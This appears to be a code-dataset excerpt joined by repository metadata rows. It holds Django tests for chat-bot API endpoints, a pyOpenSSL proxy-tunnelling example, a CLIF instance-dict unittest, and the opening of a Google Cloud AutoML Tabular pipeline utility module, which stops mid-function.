self.assertIn('Telegram Error', response.data['error'])
self.assertEqual(TelegramBot.objects.count(), 0)
def test_post_telegram_bots_not_auth(self):
self._test_post_list_not_auth(self._telegram_bot_list_url(), {'token': self.mytoken, 'enabled': 'True'})
def test_get_telegram_bot_ok(self):
data = self._test_get_detail_ok(self._telegram_bot_detail_url())
self.assertTelegramBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], data['info']['username'],
data['info']['first_name'], data['info']['last_name'])
def test_get_telegram_bot_not_auth(self):
self._test_get_detail_not_auth(self._telegram_bot_detail_url())
def test_get_telegram_bot_not_found(self):
self._test_get_detail_not_found(self._telegram_bot_detail_url(telegram_bot_pk=self.unlikely_id))
def test_put_telegram_bot_ok(self):
data = self._test_put_detail_ok(self._telegram_bot_detail_url(), {'enabled': 'False'}, TelegramBotDetail, self.bot.pk, self.bot.telegram_bot.pk)
updated = TelegramBot.objects.get(pk=self.bot.telegram_bot.pk)
self.assertFalse(updated.enabled)
self.assertTelegramBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'],
data['info']['username'], data['info']['first_name'], data['info']['last_name'], updated)
def test_put_telegram_bot_not_auth(self):
self._test_put_detail_not_auth(self._telegram_bot_detail_url(),
{'token': self.mytoken, 'enabled': 'False'}, TelegramBotDetail, self.bot.pk, self.bot.telegram_bot.pk)
def test_put_telegram_bot_not_found(self):
self._test_put_detail_not_found(self._telegram_bot_detail_url(telegram_bot_pk=self.unlikely_id),
{'token': self.mytoken, 'enabled': 'False'}, TelegramBotDetail, self.bot.pk, self.unlikely_id)
def test_delete_telegram_bot_ok(self):
self._test_delete_detail_ok(self._telegram_bot_detail_url(), TelegramBotDetail, self.bot.pk, self.bot.telegram_bot.pk)
self.assertEqual(TelegramBot.objects.count(), 0)
def test_delete_telegram_bot_not_auth(self):
self._test_delete_detail_not_auth(self._telegram_bot_detail_url(), TelegramBotDetail, self.bot.pk, self.bot.telegram_bot.pk)
def test_delete_telegram_bot_not_found(self):
self._test_delete_detail_not_found(self._telegram_bot_detail_url(telegram_bot_pk=self.unlikely_id), TelegramBotDetail, self.bot.pk, self.unlikely_id)
class TestKikBotAPI(BaseTestAPI):
def assertKikBot(self, id, created_at, updated_at, api_key, enabled, username, kik_bot=None):
if not kik_bot:
kik_bot = self.bot.kik_bot
self.assertEqual(kik_bot.api_key, api_key)
self.assertEqual(kik_bot.enabled, enabled)
self.assertEqual(kik_bot.username, username)
self.assertPermabotsModel(id, created_at, updated_at, kik_bot)
def _kik_bot_list_url(self, bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
return '%s/bots/%s/kik/' % (self.api, bot_pk)
def _kik_bot_detail_url(self, bot_pk=None, kik_bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
if not kik_bot_pk:
kik_bot_pk = self.bot.kik_bot.pk
return '%s/bots/%s/kik/%s/' % (self.api, bot_pk, kik_bot_pk)
def test_get_kik_bots_ok(self):
data = self._test_get_list_ok(self._kik_bot_list_url())
self.assertKikBot(data['id'], data['created_at'], data['updated_at'], data['api_key'], data['enabled'], data['username'], None)
def test_get_kik_bots_not_auth(self):
self._test_get_list_not_auth(self._kik_bot_list_url())
def test_kik_post_bots_ok(self):
data = self._test_post_list_ok(self._kik_bot_list_url(), KikBot, {'api_key': self.my_api_key, 'username': self.my_username, 'enabled': 'True'})
new_bot = KikBot.objects.get(api_key=self.my_api_key, username=self.my_username)
self.assertEqual(new_bot.api_key, self.my_api_key)
self.assertEqual(new_bot.username, self.my_username)
self.assertTrue(new_bot.enabled)
self.assertKikBot(data['id'], data['created_at'], data['updated_at'], data['api_key'], data['enabled'],
data['username'], new_bot)
def test_kik_post_bots_ok_with_no_enabled_field(self):
data = self._test_post_list_ok(self._kik_bot_list_url(), KikBot, {'api_key': self.my_api_key, 'username': self.my_username})
new_bot = KikBot.objects.get(api_key=self.my_api_key, username=self.my_username)
self.assertEqual(new_bot.api_key, self.my_api_key)
self.assertEqual(new_bot.username, self.my_username)
self.assertTrue(new_bot.enabled)
self.assertKikBot(data['id'], data['created_at'], data['updated_at'], data['api_key'], data['enabled'],
data['username'], new_bot)
def test_post_kik_bots_api_not_exists_in_kik(self):
TelegramBot.objects.all().delete()
response = self.client.post(self._kik_bot_list_url(),
data=json.dumps({"api_key": self.my_api_key + 'a', "enabled": True, 'username': self.my_username}),
content_type='application/json',
HTTP_AUTHORIZATION=self._gen_token(self.bot.owner.auth_token))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('Kik Error', response.data['error'])
self.assertEqual(TelegramBot.objects.count(), 0)
def test_post_kik_bots_user_not_exists_in_kik(self):
TelegramBot.objects.all().delete()
response = self.client.post(self._kik_bot_list_url(),
data=json.dumps({"api_key": self.my_api_key, "enabled": True, 'username': self.my_username + 'o'}),
content_type='application/json',
HTTP_AUTHORIZATION=self._gen_token(self.bot.owner.auth_token))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('Kik Error', response.data['error'])
self.assertEqual(TelegramBot.objects.count(), 0)
def test_post_kik_bots_not_auth(self):
self._test_post_list_not_auth(self._kik_bot_list_url(), {'api_key': self.my_api_key, 'enabled': 'True', 'username': self.my_username})
def test_get_kik_bot_ok(self):
data = self._test_get_detail_ok(self._kik_bot_detail_url())
self.assertKikBot(data['id'], data['created_at'], data['updated_at'], data['api_key'], data['enabled'], data['username'],)
def test_get_kik_bot_not_auth(self):
self._test_get_detail_not_auth(self._kik_bot_detail_url())
def test_get_kik_bot_not_found(self):
self._test_get_detail_not_found(self._kik_bot_detail_url(kik_bot_pk=self.unlikely_id))
def test_put_kik_bot_ok(self):
data = self._test_put_detail_ok(self._kik_bot_detail_url(), {'enabled': 'False'}, KikBotDetail, self.bot.pk, self.bot.kik_bot.pk)
updated = KikBot.objects.get(pk=self.bot.kik_bot.pk)
self.assertFalse(updated.enabled)
self.assertKikBot(data['id'], data['created_at'], data['updated_at'], data['api_key'], data['enabled'],
data['username'], updated)
def test_put_kik_bot_not_auth(self):
self._test_put_detail_not_auth(self._kik_bot_detail_url(),
{'api_key': self.my_api_key, 'username': self.my_username, 'enabled': 'False'},
KikBotDetail, self.bot.pk, self.bot.kik_bot.pk)
def test_put_kik_bot_not_found(self):
self._test_put_detail_not_found(self._kik_bot_detail_url(kik_bot_pk=self.unlikely_id),
{'api_key': self.my_api_key, 'username': self.my_username, 'enabled': 'False'},
KikBotDetail, self.bot.pk, self.unlikely_id)
def test_delete_kik_bot_ok(self):
self._test_delete_detail_ok(self._kik_bot_detail_url(), KikBotDetail, self.bot.pk, self.bot.kik_bot.pk)
self.assertEqual(KikBot.objects.count(), 0)
def test_delete_kik_bot_not_auth(self):
self._test_delete_detail_not_auth(self._kik_bot_detail_url(), KikBotDetail, self.bot.pk, self.bot.kik_bot.pk)
def test_delete_kik_bot_not_found(self):
self._test_delete_detail_not_found(self._kik_bot_detail_url(kik_bot_pk=self.unlikely_id), KikBotDetail, self.bot.pk, self.unlikely_id)
class TestMessengerBotAPI(BaseTestAPI):
def assertMessengerBot(self, id, created_at, updated_at, token, enabled, messenger_bot=None):
if not messenger_bot:
messenger_bot = self.bot.messenger_bot
self.assertEqual(messenger_bot.token, token)
self.assertEqual(messenger_bot.enabled, enabled)
self.assertPermabotsModel(id, created_at, updated_at, messenger_bot)
def _messenger_bot_list_url(self, bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
return '%s/bots/%s/messenger/' % (self.api, bot_pk)
def _messenger_bot_detail_url(self, bot_pk=None, messenger_bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
if not messenger_bot_pk:
messenger_bot_pk = self.bot.messenger_bot.pk
return '%s/bots/%s/messenger/%s/' % (self.api, bot_pk, messenger_bot_pk)
def test_get_messenger_bots_ok(self):
data = self._test_get_list_ok(self._messenger_bot_list_url())
self.assertMessengerBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], None)
def test_get_messenger_bots_not_auth(self):
self._test_get_list_not_auth(self._messenger_bot_list_url())
def test_messenger_post_bots_ok(self):
data = self._test_post_list_ok(self._messenger_bot_list_url(), MessengerBot, {'token': self.my_messenger_token, 'enabled': 'True'})
new_bot = MessengerBot.objects.get(token=self.my_messenger_token)
self.assertEqual(new_bot.token, self.my_messenger_token)
self.assertTrue(new_bot.enabled)
self.assertMessengerBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], new_bot)
def test_messenger_post_bots_ok_with_no_enabled_field(self):
data = self._test_post_list_ok(self._messenger_bot_list_url(), MessengerBot, {'token': self.my_messenger_token})
new_bot = MessengerBot.objects.get(token=self.my_messenger_token)
self.assertEqual(new_bot.token, self.my_messenger_token)
self.assertTrue(new_bot.enabled)
self.assertMessengerBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], new_bot)
@skip("wait for real token")
def test_post_messenger_bots_token_not_exists_in_messenger(self):
TelegramBot.objects.all().delete()
response = self.client.post(self._messenger_bot_list_url(),
data=json.dumps({"token": self.my_messenger_token + 'a', "enabled": True}),
content_type='application/json',
HTTP_AUTHORIZATION=self._gen_token(self.bot.owner.auth_token))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('Messenger Error', response.data['error'])
self.assertEqual(TelegramBot.objects.count(), 0)
def test_post_messenger_bots_not_auth(self):
self._test_post_list_not_auth(self._messenger_bot_list_url(), {'token': self.my_messenger_token, 'enabled': 'True'})
def test_get_messenger_bot_ok(self):
data = self._test_get_detail_ok(self._messenger_bot_detail_url())
self.assertMessengerBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'])
def test_get_messenger_bot_not_auth(self):
self._test_get_detail_not_auth(self._messenger_bot_detail_url())
def test_get_messenger_bot_not_found(self):
self._test_get_detail_not_found(self._messenger_bot_detail_url(messenger_bot_pk=self.unlikely_id))
def test_put_messenger_bot_ok(self):
data = self._test_put_detail_ok(self._messenger_bot_detail_url(), {'enabled': 'False'}, MessengerBotDetail, self.bot.pk, self.bot.messenger_bot.pk)
updated = MessengerBot.objects.get(pk=self.bot.messenger_bot.pk)
self.assertFalse(updated.enabled)
self.assertMessengerBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], updated)
def test_put_messenger_bot_not_auth(self):
self._test_put_detail_not_auth(self._messenger_bot_detail_url(),
{'token': self.my_api_key, 'enabled': 'False'},
MessengerBotDetail, self.bot.pk, self.bot.messenger_bot.pk)
def test_put_messenger_bot_not_found(self):
self._test_put_detail_not_found(self._messenger_bot_detail_url(messenger_bot_pk=self.unlikely_id),
{'token': self.my_api_key, 'enabled': 'False'},
MessengerBotDetail, self.bot.pk, self.unlikely_id)
def test_delete_messenger_bot_ok(self):
self._test_delete_detail_ok(self._messenger_bot_detail_url(), MessengerBotDetail, self.bot.pk, self.bot.messenger_bot.pk)
self.assertEqual(MessengerBot.objects.count(), 0)
def test_delete_messenger_bot_not_auth(self):
self._test_delete_detail_not_auth(self._messenger_bot_detail_url(), MessengerBotDetail, self.bot.pk, self.bot.messenger_bot.pk)
def test_delete_messenger_bot_not_found(self):
self._test_delete_detail_not_found(self._messenger_bot_detail_url(messenger_bot_pk=self.unlikely_id), MessengerBotDetail, self.bot.pk, self.unlikely_id)
| 56.956298
| 160
| 0.663071
|
3be26f90524b0bce15f41ccddceb6318027e2639
| 1,877
|
py
|
Python
|
examples/proxy.py
|
khadas/android_external_python_pyopenssl
|
751caf63d05da8477d934da5c05316ddeb4f64de
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
examples/proxy.py
|
khadas/android_external_python_pyopenssl
|
751caf63d05da8477d934da5c05316ddeb4f64de
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
examples/proxy.py
|
khadas/android_external_python_pyopenssl
|
751caf63d05da8477d934da5c05316ddeb4f64de
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
#!/usr/bin/env python
#
# This script demonstrates how one can use pyOpenSSL to speak SSL over an HTTP
# proxy
# The challenge here is to start talking SSL over an already connected socket
#
# Author: Mihai Ibanescu <misa@redhat.com>
#
# $Id: proxy.py,v 1.2 2004/07/22 12:01:25 martin Exp $
import sys
import socket
import string
from OpenSSL import SSL
def usage(exit_code=0):
print "Usage: %s server[:port] proxy[:port]" % sys.argv[0]
print " Connects SSL to the specified server (port 443 by default)"
print " using the specified proxy (port 8080 by default)"
sys.exit(exit_code)
def main():
# Command-line processing
if len(sys.argv) != 3:
usage(-1)
server, proxy = sys.argv[1:3]
run(split_host(server, 443), split_host(proxy, 8080))
def split_host(hostname, default_port=80):
a = string.split(hostname, ':', 1)
if len(a) == 1:
a.append(default_port)
return a[0], int(a[1])
# Connects to the server, through the proxy
def run(server, proxy):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(proxy)
except socket.error, e:
print "Unable to connect to %s:%s %s" % (proxy[0], proxy[1], str(e))
sys.exit(-1)
# Use the CONNECT method to get a connection to the actual server
s.send("CONNECT %s:%s HTTP/1.0\n\n" % (server[0], server[1]))
print "Proxy response: %s" % string.strip(s.recv(1024))
ctx = SSL.Context(SSL.SSLv23_METHOD)
conn = SSL.Connection(ctx, s)
# Go to client mode
conn.set_connect_state()
# start using HTTP
conn.send("HEAD / HTTP/1.0\n\n")
print "Sever response:"
print "-" * 40
while 1:
try:
buff = conn.recv(4096)
except SSL.ZeroReturnError:
# we're done
break
print buff,
if __name__ == '__main__':
main()
| 24.064103
| 78
| 0.627597
|
ea9e3a4a10ff228798376d3473b28b56a36da1d0
| 3,436
|
py
|
Python
|
clif/testing/python/enable_instance_dict_test.py
|
sr-gi/clif
|
39c511e5caccd203d261d97717acde8ec124f44c
|
[
"Apache-2.0"
] | null | null | null |
clif/testing/python/enable_instance_dict_test.py
|
sr-gi/clif
|
39c511e5caccd203d261d97717acde8ec124f44c
|
[
"Apache-2.0"
] | null | null | null |
clif/testing/python/enable_instance_dict_test.py
|
sr-gi/clif
|
39c511e5caccd203d261d97717acde8ec124f44c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import unittest
import parameterized
from clif.testing.python import enable_instance_dict
TYPES_WITH_DICT = (
enable_instance_dict.ConcreteEmptyWithDict,
enable_instance_dict.ConcreteEmptyWithDictFinal,
enable_instance_dict.ConcreteNonTrivialDestructorWithDict)
###############################################################################
# NOTE: The sys.getrefcount() tests in this file are highly conclusive if #
# they work, but make assumptions about Python's behavior that may #
# not necessarily be true in the future. If you see these tests failing #
# with new versions of Python, they may need to be adjusted. #
###############################################################################
class ClassModuleAttrTest(unittest.TestCase):
def testConcreteEmptyNoDict(self):
obj = enable_instance_dict.ConcreteEmptyNoDict()
self.assertFalse(hasattr(obj, '__dict__'))
@parameterized.parameterized.expand(zip(TYPES_WITH_DICT))
def testConcreteEmptyWithDict(self, type_with_dict):
obj = type_with_dict()
self.assertTrue(hasattr(obj, '__dict__'))
self.assertEqual(len(obj.__dict__), 0)
obj.color = 'red'
self.assertEqual(len(obj.__dict__), 1)
obj.height = '13'
self.assertEqual(len(obj.__dict__), 2)
with self.assertRaises(TypeError) as ctx:
obj.__dict__ = ''
self.assertEqual(
str(ctx.exception),
'__dict__ must be set to a dict, not a str')
initial_dict = obj.__dict__
self.assertEqual(sys.getrefcount(initial_dict), 3)
obj.__dict__ = {'seven': 7, 'ate': 8, 'nine': 9}
self.assertEqual(sys.getrefcount(initial_dict), 2)
self.assertEqual(len(obj.__dict__), 3)
replacement_dict = obj.__dict__
self.assertEqual(sys.getrefcount(replacement_dict), 3)
del obj
self.assertEqual(sys.getrefcount(replacement_dict), 2)
@parameterized.parameterized.expand(zip(TYPES_WITH_DICT))
def testReferenceCycle(self, type_with_dict):
obj = type_with_dict()
obj.cycle = obj
obj_dict = obj.__dict__
self.assertEqual(sys.getrefcount(obj_dict), 3)
del obj
self.assertEqual(sys.getrefcount(obj_dict), 3) # NOT 2
del obj_dict['cycle'] # breaks the reference cycle
self.assertEqual(sys.getrefcount(obj_dict), 2)
def testConcreteEmptyWithDictFinal(self):
# Minimal runtime testing. The main purpose of ConcreteEmptyWithDictFinal
# is to test that the .clif file parser can handle multiple decorators.
with self.assertRaises(TypeError) as ctx:
class _(enable_instance_dict.ConcreteEmptyWithDictFinal):
pass
self.assertIn('is not an acceptable base type', str(ctx.exception))
if __name__ == '__main__':
unittest.main()
| 37.347826
| 79
| 0.703434
|
563e4cde2b6ffa9c1715cf1963b82f6591b77577
| 56,952
|
py
|
Python
|
components/google-cloud/google_cloud_pipeline_components/experimental/automl/tabular/utils.py
|
connor-mccarthy/pipelines
|
afe07f1d43a75838ab8e6788b6cd604877dbb4bb
|
[
"Apache-2.0"
] | null | null | null |
components/google-cloud/google_cloud_pipeline_components/experimental/automl/tabular/utils.py
|
connor-mccarthy/pipelines
|
afe07f1d43a75838ab8e6788b6cd604877dbb4bb
|
[
"Apache-2.0"
] | null | null | null |
components/google-cloud/google_cloud_pipeline_components/experimental/automl/tabular/utils.py
|
connor-mccarthy/pipelines
|
afe07f1d43a75838ab8e6788b6cd604877dbb4bb
|
[
"Apache-2.0"
] | null | null | null |
"""Util functions for AutoML Tabular pipeline."""
import json
import math
import os
import pathlib
from typing import Any, Dict, List, Tuple, Optional
_DEFAULT_NUM_PARALLEL_TRAILS = 35
_DEFAULT_STAGE_2_NUM_SELECTED_TRAILS = 5
_NUM_FOLDS = 5
_DISTILL_TOTAL_TRIALS = 100
def input_dictionary_to_parameter(input_dict: Optional[Dict[str, Any]]) -> str:
"""Convert json input dict to encoded parameter string.
This function is required due to the limitation on YAML component definition
that YAML definition does not have a keyword for apply quote escape, so the
JSON argument's quote must be manually escaped using this function.
Args:
input_dict: The input json dictionary.
Returns:
The encoded string used for parameter.
"""
if not input_dict:
return ''
out = json.dumps(json.dumps(input_dict))
return out[1:-1] # remove the outside quotes, e.g., "foo" -> foo
def get_skip_evaluation_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column_name: str,
prediction_type: str,
optimization_objective: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
train_budget_milli_node_hours: float,
stage_1_num_parallel_trials: int = _DEFAULT_NUM_PARALLEL_TRAILS,
stage_2_num_parallel_trials: int = _DEFAULT_NUM_PARALLEL_TRAILS,
stage_2_num_selected_trials: int = _DEFAULT_STAGE_2_NUM_SELECTED_TRAILS,
weight_column_name: str = '',
study_spec_override: Optional[Dict[str, Any]] = None,
optimization_objective_recall_value: float = -1,
optimization_objective_precision_value: float = -1,
stage_1_tuner_worker_pool_specs_override: Optional[Dict[str, Any]] = None,
cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,
export_additional_model_without_custom_ops: bool = False,
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
stats_and_example_gen_dataflow_disk_size_gb: int = 40,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
transform_dataflow_disk_size_gb: int = 40,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '',
additional_experiments: Optional[Dict[str, Any]] = None
) -> Tuple[str, Dict[str, Any]]:
"""Get the AutoML Tabular training pipeline that skips evaluation.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column_name: The target column name.
prediction_type: The type of prediction the model is to produce.
"classification" or "regression".
optimization_objective: For binary classification, "maximize-au-roc",
"minimize-log-loss", "maximize-au-prc", "maximize-precision-at-recall", or
"maximize-recall-at-precision". For multi class classification,
"minimize-log-loss". For regression, "minimize-rmse", "minimize-mae", or
"minimize-rmsle".
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
train_budget_milli_node_hours: The train budget of creating this model,
expressed in milli node hours i.e. 1,000 value in this field means 1 node
hour.
stage_1_num_parallel_trials: Number of parallel trails for stage 1.
stage_2_num_parallel_trials: Number of parallel trails for stage 2.
stage_2_num_selected_trials: Number of selected trials for stage 2.
weight_column_name: The weight column name.
study_spec_override: The dictionary for overriding study spec. The
dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/study.proto#L181.
optimization_objective_recall_value: Required when optimization_objective is
"maximize-precision-at-recall". Must be between 0 and 1, inclusive.
optimization_objective_precision_value: Required when optimization_objective
is "maximize-recall-at-precision". Must be between 0 and 1, inclusive.
stage_1_tuner_worker_pool_specs_override: The dictionary for overriding.
stage 1 tuner worker pool spec. The dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/custom_job.proto#L172.
cv_trainer_worker_pool_specs_override: The dictionary for overriding stage
cv trainer worker pool spec. The dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/custom_job.proto#L172.
export_additional_model_without_custom_ops: Whether to export additional
model without custom TensorFlow operators.
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
stats_and_example_gen_dataflow_disk_size_gb: Dataflow worker's disk size in
GB for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
transform_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
transform component.
dataflow_subnetwork: Dataflow's fully qualified subnetwork name, when empty
the default
subnetwork will be used. Example:
https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
Tuple of pipeline_definiton_path and parameter_values.
"""
if stage_1_num_parallel_trials <= 0:
stage_1_num_parallel_trials = _DEFAULT_NUM_PARALLEL_TRAILS
if stage_2_num_parallel_trials <= 0:
stage_2_num_parallel_trials = _DEFAULT_NUM_PARALLEL_TRAILS
hours = float(train_budget_milli_node_hours) / 1000.0
multiplier = stage_1_num_parallel_trials * hours / 500.0
stage_1_single_run_max_secs = int(math.sqrt(multiplier) * 2400.0)
phase_2_rounds = int(
math.sqrt(multiplier) * 100 / stage_2_num_parallel_trials + 0.5)
if phase_2_rounds < 1:
phase_2_rounds = 1
# All of magic number "1.3" above is because the trial doesn't always finish
# in time_per_trial. 1.3 is an empirical safety margin here.
stage_1_deadline_secs = int(hours * 3600.0 - 1.3 *
stage_1_single_run_max_secs * phase_2_rounds)
if stage_1_deadline_secs < hours * 3600.0 * 0.5:
stage_1_deadline_secs = int(hours * 3600.0 * 0.5)
# Phase 1 deadline is the same as phase 2 deadline in this case. Phase 2
# can't finish in time after the deadline is cut, so adjust the time per
# trial to meet the deadline.
stage_1_single_run_max_secs = int(stage_1_deadline_secs /
(1.3 * phase_2_rounds))
reduce_search_space_mode = 'minimal'
if multiplier > 2:
reduce_search_space_mode = 'regular'
if multiplier > 4:
reduce_search_space_mode = 'full'
# Stage 2 number of trials is stage_1_num_selected_trials *
# _NUM_FOLDS, which should be equal to phase_2_rounds *
# stage_2_num_parallel_trials. Use this information to calculate
# stage_1_num_selected_trials:
stage_1_num_selected_trials = int(phase_2_rounds *
stage_2_num_parallel_trials / _NUM_FOLDS)
stage_1_deadline_hours = stage_1_deadline_secs / 3600.0
stage_2_deadline_hours = hours - stage_1_deadline_hours
stage_2_single_run_max_secs = stage_1_single_run_max_secs
parameter_values = {
'project':
project,
'location':
location,
'root_dir':
root_dir,
'target_column_name':
target_column_name,
'prediction_type':
prediction_type,
'optimization_objective':
optimization_objective,
'transformations':
input_dictionary_to_parameter(transformations),
'split_spec':
input_dictionary_to_parameter(split_spec),
'data_source':
input_dictionary_to_parameter(data_source),
'stage_1_deadline_hours':
stage_1_deadline_hours,
'stage_1_num_parallel_trials':
stage_1_num_parallel_trials,
'stage_1_num_selected_trials':
stage_1_num_selected_trials,
'stage_1_single_run_max_secs':
stage_1_single_run_max_secs,
'reduce_search_space_mode':
reduce_search_space_mode,
'stage_2_deadline_hours':
stage_2_deadline_hours,
'stage_2_num_parallel_trials':
stage_2_num_parallel_trials,
'stage_2_num_selected_trials':
stage_2_num_selected_trials,
'stage_2_single_run_max_secs':
stage_2_single_run_max_secs,
'weight_column_name':
weight_column_name,
'optimization_objective_recall_value':
optimization_objective_recall_value,
'optimization_objective_precision_value':
optimization_objective_precision_value,
'study_spec_override':
input_dictionary_to_parameter(study_spec_override),
'stage_1_tuner_worker_pool_specs_override':
input_dictionary_to_parameter(stage_1_tuner_worker_pool_specs_override
),
'cv_trainer_worker_pool_specs_override':
input_dictionary_to_parameter(cv_trainer_worker_pool_specs_override),
'export_additional_model_without_custom_ops':
export_additional_model_without_custom_ops,
'stats_and_example_gen_dataflow_machine_type':
stats_and_example_gen_dataflow_machine_type,
'stats_and_example_gen_dataflow_max_num_workers':
stats_and_example_gen_dataflow_max_num_workers,
'stats_and_example_gen_dataflow_disk_size_gb':
stats_and_example_gen_dataflow_disk_size_gb,
'transform_dataflow_machine_type':
transform_dataflow_machine_type,
'transform_dataflow_max_num_workers':
transform_dataflow_max_num_workers,
'transform_dataflow_disk_size_gb':
transform_dataflow_disk_size_gb,
'dataflow_subnetwork':
dataflow_subnetwork,
'dataflow_use_public_ips':
dataflow_use_public_ips,
'encryption_spec_key_name':
encryption_spec_key_name,
'additional_experiments':
input_dictionary_to_parameter(additional_experiments),
}
if additional_experiments:
parameter_values.update({
'additional_experiments':
input_dictionary_to_parameter(additional_experiments)})
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(), 'skip_evaluation_pipeline.json')
return pipeline_definition_path, parameter_values
# TODO(helin): Remove *args in the argument section for getting pipelines.
def get_default_pipeline_and_parameters(
*args,
dataflow_service_account: str = '',
evaluation_batch_predict_machine_type: str = 'n1-standard-16',
evaluation_batch_predict_starting_replica_count: int = 25,
evaluation_batch_predict_max_replica_count: int = 25,
evaluation_dataflow_machine_type: str = 'n1-standard-4',
evaluation_dataflow_max_num_workers: int = 25,
evaluation_dataflow_disk_size_gb: int = 50,
**kwargs) -> Tuple[str, Dict[str, Any]]:
"""Get the AutoML Tabular default training pipeline.
Args:
*args: All arguments in `get_skip_evaluation_pipeline_and_parameters`.
dataflow_service_account: Custom service account to run dataflow jobs.
evaluation_batch_predict_machine_type: The prediction server machine type
for batch predict components during evaluation.
evaluation_batch_predict_starting_replica_count: The initial number of
prediction server for batch predict components during evaluation.
evaluation_batch_predict_max_replica_count: The max number of prediction
server for batch predict components during evaluation.
evaluation_dataflow_machine_type: The dataflow machine type for evaluation
components.
evaluation_dataflow_max_num_workers: The max number of Dataflow workers for
evaluation components.
evaluation_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
evaluation components.
**kwargs: All arguments in `get_skip_evaluation_pipeline_and_parameters`.
Returns:
Tuple of pipeline_definiton_path and parameter_values.
"""
_, parameter_values = get_skip_evaluation_pipeline_and_parameters(
*args, **kwargs)
parameter_values.update({
'dataflow_service_account':
dataflow_service_account,
'evaluation_batch_predict_machine_type':
evaluation_batch_predict_machine_type,
'evaluation_batch_predict_starting_replica_count':
evaluation_batch_predict_starting_replica_count,
'evaluation_batch_predict_max_replica_count':
evaluation_batch_predict_max_replica_count,
'evaluation_dataflow_machine_type':
evaluation_dataflow_machine_type,
'evaluation_dataflow_max_num_workers':
evaluation_dataflow_max_num_workers,
'evaluation_dataflow_disk_size_gb':
evaluation_dataflow_disk_size_gb,
})
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(), 'default_pipeline.json')
return pipeline_definition_path, parameter_values
def get_feature_selection_skip_evaluation_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column_name: str,
prediction_type: str,
optimization_objective: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
max_selected_features: int,
train_budget_milli_node_hours: float,
stage_1_num_parallel_trials: int = _DEFAULT_NUM_PARALLEL_TRAILS,
stage_2_num_parallel_trials: int = _DEFAULT_NUM_PARALLEL_TRAILS,
stage_2_num_selected_trials: int = _DEFAULT_STAGE_2_NUM_SELECTED_TRAILS,
weight_column_name: str = '',
study_spec_override: Optional[Dict[str, Any]] = None,
optimization_objective_recall_value: float = -1,
optimization_objective_precision_value: float = -1,
stage_1_tuner_worker_pool_specs_override: Optional[Dict[str, Any]] = None,
cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,
export_additional_model_without_custom_ops: bool = False,
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
stats_and_example_gen_dataflow_disk_size_gb: int = 40,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
transform_dataflow_disk_size_gb: int = 40,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
